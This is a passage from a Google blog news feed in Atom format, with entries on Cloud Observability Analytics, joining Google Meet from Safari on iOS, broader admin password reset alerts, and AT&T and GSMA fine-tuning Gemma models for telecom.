&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;You can find more query examples for trace in this &lt;/span&gt;&lt;a href="https://github.com/GoogleCloudPlatform/observability-analytics-samples" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;github repo&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Observability Analytics page vs. log and trace explorers&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Cloud Logging and Trace will both continue to offer &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;log and trace explorers&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; — tools that are optimized for finding and inspecting individual log entries and traces, making them ideal for investigating a specific issue.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Observability Analytics, in contrast, is designed for aggregations and in-depth analysis. Think of it as your tool for answering broad questions about your services, such as "What is the 95th percentile latency for my checkout service over the last week?" or "Which API endpoints have the highest error rate after our last deployment?"&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Enabling AI agents to query traces and logs using SQL&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Finally, w&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;ith rapid growth in agentic assistants, you need to be able to access your telemetry programmatically. The &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/stackdriver/docs/reference/observability/api/rest/v1/projects.locations.buckets.datasets.links/create?rep_location=global"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Observability API&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; lets you create linked BigQuery datasets for your observability buckets, making the data available to query directly from the BigQuery ecosystem. Now, your AI agents or analytical workloads can query this data directly via standard BigQuery APIs and tooling.&lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;&lt;strong style="vertical-align: baseline;"&gt;Get started today&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;You can start analyzing your trace data in Observability Analytics today. Simply navigate to the &lt;/span&gt;&lt;a href="https://console.cloud.google.com/logs/analytics"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Observability Analytics&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; page in the Google Cloud console to begin exploring your trace data. Ensure you have enabled the Observability API to unlock configurations and management capabilities.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/management-tools/query-logs-and-traces-with-sql-in-observability-analytics/" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-23T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/products-and-platforms/products/search/summergeist-google-trends/</id>
    <title>What’s trending on Google this summer</title>
    <updated>2026-06-23T16:00:00+00:00</updated>
    <content type="html">Bright, colorful illustration on a red background showing a blue/green/yellow ombre sun, palm trees, flip flops, sunglasses and shell</content>
    <link href="https://blog.google/products-and-platforms/products/search/summergeist-google-trends/" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-23T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://workspaceupdates.googleblog.com/2026/06/join-google-meet-calls-from-safari-on-iOS-devices.html</id>
    <title>Join Google Meet calls from Safari on iOS devices</title>
    <updated>2026-06-23T15:53:32+00:00</updated>
    <content type="html">Prior to this update, iOS users without the Gmail or Meet apps were unable to participate in Google Meet sessions on their mobile devices. Now, iOS mobile device users can join meetings directly through Safari, without needing to install an app. The process is now seamless; individuals without a Google account can simply provide their name to request entry into the call.&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEit7fdth7XzrcoaoxCJHfJfYupsqS-KbHIp84qUqvh_O1Zc0d_1DDCmx_RwQjO1nss_pThngRgtOgcZecOlaaf0-LSUkVC8_n74DXDxnhMpzuC_F8pEfXnthna01IvM74lZBVewDCjrgt8R1vbTdW1nOpqwV1dw5wPOlADHuK6psZ8nf82YvJs3b41SyMk/s1391/Join%20Google%20Meet%20calls%20from%20Safari%20on%20iOS%20devices%20-%207015.gif" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEit7fdth7XzrcoaoxCJHfJfYupsqS-KbHIp84qUqvh_O1Zc0d_1DDCmx_RwQjO1nss_pThngRgtOgcZecOlaaf0-LSUkVC8_n74DXDxnhMpzuC_F8pEfXnthna01IvM74lZBVewDCjrgt8R1vbTdW1nOpqwV1dw5wPOlADHuK6psZ8nf82YvJs3b41SyMk/w294-h640/Join%20Google%20Meet%20calls%20from%20Safari%20on%20iOS%20devices%20-%207015.gif" width="294" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;i&gt;&lt;br /&gt;In this animation, an iPhone user has received a link to join a Meet call. They click on the link and immediately join via their Safari browser.&lt;/i&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;div&gt;&lt;h3 style="text-align: left;"&gt;Getting started&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Admins: &lt;/b&gt;There is no admin control for this feature.&lt;/li&gt;&lt;li&gt;&lt;b&gt;End users:&lt;/b&gt; If an iOS user attempts to join a Google Meet call and doesn’t have the Gmail or Meet app installed, they’ll be automatically directed to join via Safari.&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Rollout pace&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid Release and Scheduled Release domains:&lt;/a&gt; Extended rollout (potentially longer than 15 days for feature visibility) starting on June 23, 2026&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Availability&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Available to all Google Workspace customers and users with personal Google accounts&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;/div&gt;</content>
    <link href="https://workspaceupdates.googleblog.com/2026/06/join-google-meet-calls-from-safari-on-iOS-devices.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-06-23T15:53:32+00:00</published>
  </entry>
  <entry>
    <id>http://workspaceupdates.googleblog.com/2026/06/join-google-meet-calls-from-safari-on-iOS-devices.html</id>
    <title>Join Google Meet calls from Safari on iOS devices</title>
    <updated>2026-06-23T15:53:32+00:00</updated>
    <content type="html">Prior to this update, iOS users without the Gmail or Meet apps were unable to participate in Google Meet sessions on their mobile devices. Now, iOS mobile device users can join meetings directly through Safari, without needing to install an app. The process is now seamless; individuals without a Google account can simply provide their name to request entry into the call.&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEit7fdth7XzrcoaoxCJHfJfYupsqS-KbHIp84qUqvh_O1Zc0d_1DDCmx_RwQjO1nss_pThngRgtOgcZecOlaaf0-LSUkVC8_n74DXDxnhMpzuC_F8pEfXnthna01IvM74lZBVewDCjrgt8R1vbTdW1nOpqwV1dw5wPOlADHuK6psZ8nf82YvJs3b41SyMk/s1391/Join%20Google%20Meet%20calls%20from%20Safari%20on%20iOS%20devices%20-%207015.gif" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEit7fdth7XzrcoaoxCJHfJfYupsqS-KbHIp84qUqvh_O1Zc0d_1DDCmx_RwQjO1nss_pThngRgtOgcZecOlaaf0-LSUkVC8_n74DXDxnhMpzuC_F8pEfXnthna01IvM74lZBVewDCjrgt8R1vbTdW1nOpqwV1dw5wPOlADHuK6psZ8nf82YvJs3b41SyMk/w294-h640/Join%20Google%20Meet%20calls%20from%20Safari%20on%20iOS%20devices%20-%207015.gif" width="294" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;i&gt;&lt;br /&gt;In this animation, an iPhone user has received a link to join a Meet call. They click on the link and immediately join via their Safari browser.&lt;/i&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;div&gt;&lt;h3 style="text-align: left;"&gt;Getting started&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Admins: &lt;/b&gt;There is no admin control for this feature.&lt;/li&gt;&lt;li&gt;&lt;b&gt;End users:&lt;/b&gt; If an iOS user attempts to join a Google Meet call and doesn’t have the Gmail or Meet app installed, they’ll be automatically directed to join via Safari.&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Rollout pace&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid Release and Scheduled Release domains:&lt;/a&gt; Extended rollout (potentially longer than 15 days for feature visibility) starting on June 23, 2026&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Availability&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Available to all Google Workspace customers and users with personal Google accounts&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;/div&gt;</content>
    <link href="http://workspaceupdates.googleblog.com/2026/06/join-google-meet-calls-from-safari-on-iOS-devices.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-06-23T15:53:32+00:00</published>
  </entry>
  <entry>
    <id>https://workspaceupdates.googleblog.com/2026/06/enhanced-security-monitoring-with-expanded-Admin-password-reset-alerts.html</id>
    <title>Enhanced security monitoring with expanded Admin password reset alerts</title>
    <updated>2026-06-23T14:29:50+00:00</updated>
    <content type="html">In &lt;a href="https://support.google.com/a/answer/9105393" target="_blank"&gt;Alert Center&lt;/a&gt;, we are expanding the existing “Super Admin password reset” alert into a broader &lt;b&gt;Admin password reset&lt;/b&gt; alert. Previously, this rule only triggered alerts when a super admin’s password was changed. With this update, the alert will now cover password resets for &lt;b&gt;all&lt;/b&gt; administrator roles within your organization.&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;This update provides admins with better visibility and control over the security of their organization's privileged accounts. Monitoring password changes for all admin roles provide a higher level of oversight to respond more quickly to potential account compromises or unauthorized changes.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;This change aligns with security best practices by treating all administrative access with increased vigilance.&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Getting started&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Admins:&lt;/b&gt; This feature will be &lt;b&gt;ON&lt;/b&gt; by default and automatically replaces the previous "Super Admin password reset" rule. No action is required to enable the new alert. If you had modified the recipient list for the previous rule, those settings will automatically carry over to the new rule.&lt;/li&gt;&lt;li&gt;&lt;b&gt;End users: &lt;/b&gt;There is no end user setting or impact for this feature.&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Rollout pace&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid Release and Scheduled Release domains:&lt;/a&gt; Gradual rollout (up to 15 days for feature visibility) started on June 22, 2026&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Availability&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Available to all Google Workspace customers&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Resources&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Google Workspace Admin Help: &lt;a href="https://support.google.com/a/answer/9104586" target="_blank"&gt;View alert details&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;</content>
    <link href="https://workspaceupdates.googleblog.com/2026/06/enhanced-security-monitoring-with-expanded-Admin-password-reset-alerts.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-06-23T14:29:50+00:00</published>
  </entry>
  <entry>
    <id>http://workspaceupdates.googleblog.com/2026/06/enhanced-security-monitoring-with-expanded-Admin-password-reset-alerts.html</id>
    <title>Enhanced security monitoring with expanded Admin password reset alerts</title>
    <updated>2026-06-23T14:29:50+00:00</updated>
    <content type="html">In &lt;a href="https://support.google.com/a/answer/9105393" target="_blank"&gt;Alert Center&lt;/a&gt;, we are expanding the existing “Super Admin password reset” alert into a broader &lt;b&gt;Admin password reset&lt;/b&gt; alert. Previously, this rule only triggered alerts when a super admin’s password was changed. With this update, the alert will now cover password resets for &lt;b&gt;all&lt;/b&gt; administrator roles within your organization.&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;This update provides admins with better visibility and control over the security of their organization's privileged accounts. Monitoring password changes for all admin roles provide a higher level of oversight to respond more quickly to potential account compromises or unauthorized changes.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;This change aligns with security best practices by treating all administrative access with increased vigilance.&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Getting started&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Admins:&lt;/b&gt; This feature will be &lt;b&gt;ON&lt;/b&gt; by default and automatically replaces the previous "Super Admin password reset" rule. No action is required to enable the new alert. If you had modified the recipient list for the previous rule, those settings will automatically carry over to the new rule.&lt;/li&gt;&lt;li&gt;&lt;b&gt;End users: &lt;/b&gt;There is no end user setting or impact for this feature.&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Rollout pace&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid Release and Scheduled Release domains:&lt;/a&gt; Gradual rollout (up to 15 days for feature visibility) started on June 22, 2026&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Availability&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Available to all Google Workspace customers&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Resources&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Google Workspace Admin Help: &lt;a href="https://support.google.com/a/answer/9104586" target="_blank"&gt;View alert details&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;</content>
    <link href="http://workspaceupdates.googleblog.com/2026/06/enhanced-security-monitoring-with-expanded-Admin-password-reset-alerts.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-06-23T14:29:50+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/intl/pl-pl/nowosci-firmie/gotyk-sol-i-technologie-jutra-zobacz-nowa-przestrzen-google-w-krakowie</id>
    <title>Gotyk, sól i technologie jutra. Zobacz nową przestrzeń Google w Krakowie</title>
    <updated>2026-06-23T14:00:00+00:00</updated>
    <content type="html">Zdjęcie recepcji w nowym biurze Google w Krakowie</content>
    <link href="https://blog.google/intl/pl-pl/nowosci-firmie/gotyk-sol-i-technologie-jutra-zobacz-nowa-przestrzen-google-w-krakowie" rel="alternate"/>
    <category term="Google Poland"/>
    <published>2026-06-23T14:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/intl/pl-pl/nowosci-firmie/gotyk-sol-i-technologie-jutra-zobacz-nowa-przestrzen-google-w-krakowie/</id>
    <title>Gotyk, sól i technologie jutra. Zobacz nową przestrzeń Google w Krakowie</title>
    <updated>2026-06-23T14:00:00+00:00</updated>
    <content type="html">Zdjęcie recepcji w nowym biurze Google w Krakowie</content>
    <link href="https://blog.google/intl/pl-pl/nowosci-firmie/gotyk-sol-i-technologie-jutra-zobacz-nowa-przestrzen-google-w-krakowie/" rel="alternate"/>
    <category term="Google Poland"/>
    <published>2026-06-23T14:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/products/ads-commerce/youtube-insights-tools-cannes-lions-2026/</id>
    <title>Cannes Lions 2026: Strengthen creative campaigns with new tools from YouTube</title>
    <updated>2026-06-23T12:30:00+00:00</updated>
    <content type="html">&lt;img src="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/YT_Illustration.max-600x600.format-webp.webp" /&gt;YouTube announces new insights tools to support creator partnerships and strengthen ad campaigns at Cannes Lions 2026.</content>
    <link href="https://blog.google/products/ads-commerce/youtube-insights-tools-cannes-lions-2026/" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-23T12:30:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/company-news/inside-google/around-the-globe/google-europe/preserving-cultural-heritage-inside-google-deepminds-collaboration-with-pele/</id>
    <title>Preserving cultural heritage: Inside Google DeepMind’s collaboration with Pelé</title>
    <updated>2026-06-23T12:30:00+00:00</updated>
    <content type="html">A 3x3 grid of images showcasing behind-the-scenes film production, soccer training, and video editing software interfaces.</content>
    <link href="https://blog.google/company-news/inside-google/around-the-globe/google-europe/preserving-cultural-heritage-inside-google-deepminds-collaboration-with-pele/" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-23T12:30:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/topics/telecommunications/open-models-global-networks-how-att-and-gsma-are-accelerating-innovation-with-gemma</id>
    <title>Open models, global networks: How AT&amp;T and GSMA are accelerating telecom innovation with Gemma</title>
    <updated>2026-06-23T12:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Telecommunications is an incredibly complex, highly specialized domain. Modern mobile networks are inherently multi-vendor, featuring diverse and often proprietary data structures. While AI has made massive leaps in general language and coding, telecom domain knowledge is rarely accessible on the open internet — there is simply no "Wikipedia" for telecoms.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This data scarcity creates a major hurdle for AI models trying to deeply understand network operations. When operating at an immense global scale that connects billions of people hundreds of billions of times a day, the industry requires absolute precision. Yet, according to GSMA Intelligence, only &lt;/span&gt;&lt;a href="https://www.gsmaintelligence.com/research/telco-ai-state-of-the-market-q1-2026" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;16% of total AI deployments in telecoms are on the network&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, largely due to the difficulty of training models on specialized domain knowledge.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;While general-purpose AI models have come a long way, the scale, complexity, and specificity faced by telecom providers means domain-specific models remain the best way to achieve the dramatic network and process automation and agentic workflows that are at the heart of the AI era. And it takes an open model to deliver the flexibility and dynamism global networks require.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Why domain-specific models matter&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Generalized frontier models are incredibly capable at broad reasoning and language tasks, but they lack the foundational context required to manage critical infrastructure. General models still struggle with highly specialized vocabulary, complex network topologies, and vendor-specific telemetry data unique to the telecom sector. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Telco-specific models solve this by anchoring the AI in the actual realities of network operations. By training on domain-specific datasets, these tailored models can interpret nuanced technical logs, diagnose network performance bottlenecks, and understand standard industry protocols with the high degree of accuracy and precision required for real-time systems.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Google’s Gemma models: Underpinning Open Telco AI &lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To address this challenge, the GSMA recently launched the &lt;/span&gt;&lt;a href="https://www.open-telco.ai/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Open Telco AI&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; platform to build accurate, efficient, and trusted telco-grade AI. As a core part of this collaborative effort, AT&amp;amp;T post-trained a family of open telco models, called &lt;/span&gt;&lt;a href="https://huggingface.co/farbodtavakkoli/models" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;OTel&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, on different architectures including &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/gemma-4-available-on-google-cloud?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google’s open-source Gemma models&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;These models were trained on a specialized telco-specific dataset curated by GSMA and its collaborators, including telecom operators, network equipment providers, and academia. The initiative successfully delivered 30 models across a range of sizes and architectures, optimizing the balance between accuracy and efficiency.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Crucially, these models are built with safety at their core, being trained for abstention using &lt;/span&gt;&lt;a href="https://cloud.google.com/use-cases/retrieval-augmented-generation"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;retrieval augmented generation (RAG)&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to drastically reduce hallucinations — an absolute necessity in highly regulated telecom environments that are so central to modern life.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;“The Open Telco AI platform represents a critical milestone in establishing trusted, domain-specific intelligence for the telecommunications industry,” said Louis Powell, director for AI technologies at GSMA. “By leveraging open-source foundations like Gemma, we are proving that highly accurate, efficient, and reproducible models can be built through global industry collaboration.”&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Gemma emerges as a leading model&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;AT&amp;amp;T’s tests during OTel development highlight the strength of Gemma compared to other architectures, demonstrating strong performance gains across the entire OTel model family after telecom-specific fine-tuning. Notably: &lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The &lt;/span&gt;&lt;a href="https://blog.google/innovation-and-ai/technology/developers-tools/gemma-4/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;gemma-4-E4B-it&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; model returned correct response 91.74% of the time, achieving the highest overall accuracy for all models tested.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This baseline version of Gemma 3 with 27-billion parameters delivered the strongest performance in initial model training across the models tested by AT&amp;amp;T.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The Gemma 3 model with 300-million telco-related &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/developers-practitioners/meet-ais-multitool-vector-embeddings?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;embeddings&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; saw a significant retrieval improvement.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;"Gemma models have increasingly been setting the standard for open-source fine-tuning," said Mark Austin, VP of data science and AI at AT&amp;amp;T. "By training these models specifically on telco data, we'll be able to outperform legacy models several times its size in certain telco scenarios. This can help increase accuracy while driving down costs at the same time."&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Empowering the future with Google Cloud's full-stack solutions&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The impact of this open collaboration has been immediate, with over 18 million downloads of the models to date. Today, OTel stands as one of the top models on the &lt;/span&gt;&lt;a href="https://www.open-telco.ai/benchmarks/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Open Telco Benchmarks&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, demonstrating that tailored, smaller models can outperform massive frontier models when optimized for specific domains.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Looking ahead, Google Cloud is committed to supporting telecom operators globally in developing and deploying their own custom telco AI models. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;By providing a comprehensive, full-stack solution — including robust AI-optimized infrastructure, AI development tools, and open models like Gemma — we can help operators, vendors, and innovators fine-tune these models further with their own data. This enables telecom operators to accelerate their journey in AI adoption while deploying telco-grade AI safely using Gemma’s built-in support and guardrails.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Together, the telecom industry can replicate the incredible progress seen in coding and reasoning, bringing those advanced capabilities into critical telecom sub-domains such as automated network configuration and self-healing systems.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/topics/telecommunications/open-models-global-networks-how-att-and-gsma-are-accelerating-innovation-with-gemma" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-23T12:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/topics/telecommunications/open-models-global-networks-how-att-and-gsma-are-accelerating-innovation-with-gemma/</id>
    <title>Open models, global networks: How AT&amp;T and GSMA are accelerating telecom innovation with Gemma</title>
    <updated>2026-06-23T12:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Telecommunications is an incredibly complex, highly specialized domain. Modern mobile networks are inherently multi-vendor, featuring diverse and often proprietary data structures. While AI has made massive leaps in general language and coding, telecom domain knowledge is rarely accessible on the open internet — there is simply no "Wikipedia" for telecoms.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This data scarcity creates a major hurdle for AI models trying to deeply understand network operations. When operating at an immense global scale that connects billions of people hundreds of billions of times a day, the industry requires absolute precision. Yet, according to GSMA Intelligence, only &lt;/span&gt;&lt;a href="https://www.gsmaintelligence.com/research/telco-ai-state-of-the-market-q1-2026" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;16% of total AI deployments in telecoms are on the network&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, largely due to the difficulty of training models on specialized domain knowledge.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;While general-purpose AI models have come a long way, the scale, complexity, and specificity faced by telecom providers means domain-specific models remain the best way to achieve the dramatic network and process automation and agentic workflows that are at the heart of the AI era. And it takes an open model to deliver the flexibility and dynamism global networks require.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Why domain-specific models matter&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Generalized frontier models are incredibly capable at broad reasoning and language tasks, but they lack the foundational context required to manage critical infrastructure. General models still struggle with highly specialized vocabulary, complex network topologies, and vendor-specific telemetry data unique to the telecom sector. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Telco-specific models solve this by anchoring the AI in the actual realities of network operations. By training on domain-specific datasets, these tailored models can interpret nuanced technical logs, diagnose network performance bottlenecks, and understand standard industry protocols with the high degree of accuracy and precision required for real-time systems.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Google’s Gemma models: Underpinning Open Telco AI &lt;/strong&gt;&lt;/h3&gt;
